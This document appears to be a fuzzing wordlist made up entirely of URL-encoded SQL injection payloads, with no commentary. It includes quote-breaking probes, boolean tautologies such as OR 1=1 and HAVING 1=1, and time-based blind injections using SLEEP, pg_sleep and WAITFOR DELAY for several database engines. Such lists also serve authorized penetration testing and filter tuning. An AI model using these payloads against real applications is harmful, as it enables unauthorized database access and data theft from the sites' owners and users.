'+''
'
'`
''
'
"
""
'//
'
\\
';
'
'or+"
'or+"
'--+or+#
''+OR+'1
''+OR+1+--+-
'"+OR+""+="
'"+OR+1=1+--+-
''+OR+''=''
'='
'LIKE'
'=0--+
'+OR+1=1
''+OR+''x''=''xOR+1=1
'+OR+1=0
'+OR+x=x
'+OR+x=y
'+OR+1=1#
'+OR+1=0#
'+OR+x=x#
'+OR+x=y#
'+OR+1=1--+
'+OR+1=0--+
'+OR+x=x--+
'+OR+x=y--+
'+OR+3409=3409+AND+('pytW'+LIKE+'pytW
'+OR+3409=3409+AND+('pytW'+LIKE+'pytY
'+HAVING+1=1
'+HAVING+1=0
'+HAVING+1=1#
'+HAVING+1=0#
'+HAVING+1=1--+
'+HAVING+1=0--+
'+AND+1=1
'+AND+1=0
'+AND+1=1--+
'+AND+1=0--+
'+AND+1=1#
'+AND+1=0#
'+AND+1=1+AND+'%'=''
'+AND+1=0+AND+'%'=''
'+AND+1083=1083+AND+(1427=1427
'+AND+7506=9091+AND+(5913=5913
'+AND+1083=1083+AND+('1427=1427
'+AND+7506=9091+AND+('5913=5913
'+sleep(5)#
'1+or+sleep(5)#
'"+or+sleep(5)#
''+or+sleep(5)#
'"+or+sleep(5)=''
''+or+sleep(5)=''
'1)+or+sleep(5)#
'")+or+sleep(5)=''
'')+or+sleep(5)=''
'1))+or+sleep(5)#
'"))+or+sleep(5)="
'))+or+sleep(5)="
';waitfor+delay+'0:0:5'--
');waitfor+delay+'0:0:5'--
'pg_sleep(5)--
'1+or+pg_sleep(5)--
'AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))bAKL)+AND+'vRxe'='vRxe
'AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))YjoC)+AND+'%'=''
'AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))nQIP)
'AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))nQIP)--
'AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))nQIP)#"
''+or+pg_sleep(5)--
''+or+pg_sleep(5)#
'waitfor+delay+'00:00:05'
'waitfor+delay+'00:00:05'--
'pg_SLEEP(5)
'pg_SLEEP(5)--
'pg_SLEEP(5)#
'or+pg_SLEEP(5)
'or+pg_SLEEP(5)--
'or+pg_SLEEP(5)#
''\'"
'AnD+SLEEP(5)
'AnD+SLEEP(5)--
'AnD+SLEEP(5)#
'&&SLEEP(5)
'&&SLEEP(5)--
'&&SLEEP(5)#
''+AnD+SLEEP(5)+ANd+''1
''&&SLEEP(5)&&''1
'ORDER+BY+SLEEP(5)
'ORDER+BY+SLEEP(5)--
'ORDER+BY+SLEEP(5)#
'(SELECT+*+FROM+(SELECT(SLEEP(5)))ecMj)
'(SELECT+*+FROM+(SELECT(SLEEP(5)))ecMj)#
'(SELECT+*+FROM+(SELECT(SLEEP(5)))ecMj)--+
